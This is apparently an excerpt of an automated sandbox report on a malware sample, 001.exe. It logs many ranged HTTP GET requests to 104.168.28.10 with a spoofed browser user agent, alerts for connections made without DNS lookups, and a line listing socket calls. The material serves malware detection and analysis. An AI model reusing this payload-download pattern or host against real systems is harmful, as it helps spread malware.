Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4523008-4531199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4531200-4539391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4539392-4543487User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4543488-4559871User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4539392-4543487User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4559872-4576255User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4576256-4609023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4609024-4625407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4625408-4658175User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4658176-4690943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4690944-4695039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4695040-4697087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4697088-4705279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4705280-4709375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4709376-4713471User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4713472-4779007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4779008-4787199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4787200-4795391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4795392-4803583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4803584-4805631User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4805632-4809727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4803584-4805631User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4809728-4826111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4826112-4842495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4842496-4858879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4858880-4862975User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4862976-4867071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4867072-4899839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4899840-4908031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4908032-4916223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4867072-4899839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4916224-4924415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4924416-4932607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4932608-4936703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4936704-4944895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4944896-4961279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4932608-4936703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4936704-4944895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4961280-4965375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4965376-4998143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4998144-5030911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5030912-5039103User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5039104-5043199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5043200-5047295User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5047296-5051391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5051392-5067775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5067776-5075967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5075968-5084159User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5084160-5092351User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5092352-5094399User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5094400-5127167User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5127168-5143551User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5143552-5159935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5159936-5176319User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5176320-5192703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5143552-5159935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5192704-5196799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5196800-5200895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5200896-5266431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5266432-5274623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5274624-5307391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5307392-5315583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5315584-5348351User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5348352-5364735User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5364736-5381119User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5381120-5389311User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5389312-5405695User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5405696-5438463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5438464-5471231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5471232-5487615User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5487616-5503999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5504000-5536767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5536768-5569535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5569536-5606383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008692C4 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,__swprintf_l,send,recv,closesocket,closesocket,closesocket,closesocket,1_2_008692C4
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-139263User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=139264-147455User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=147456-155647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=155648-172031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=172032-188415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=188416-204799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=204800-237567User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=188416-204799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=172032-188415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=237568-303103User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=172032-188415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=188416-204799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=303104-434175User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=434176-442367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=442368-450559User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=450560-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-475135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=475136-491519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=491520-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-557055User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=557056-573439User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=573440-638975User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=638976-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-753663User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=753664-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
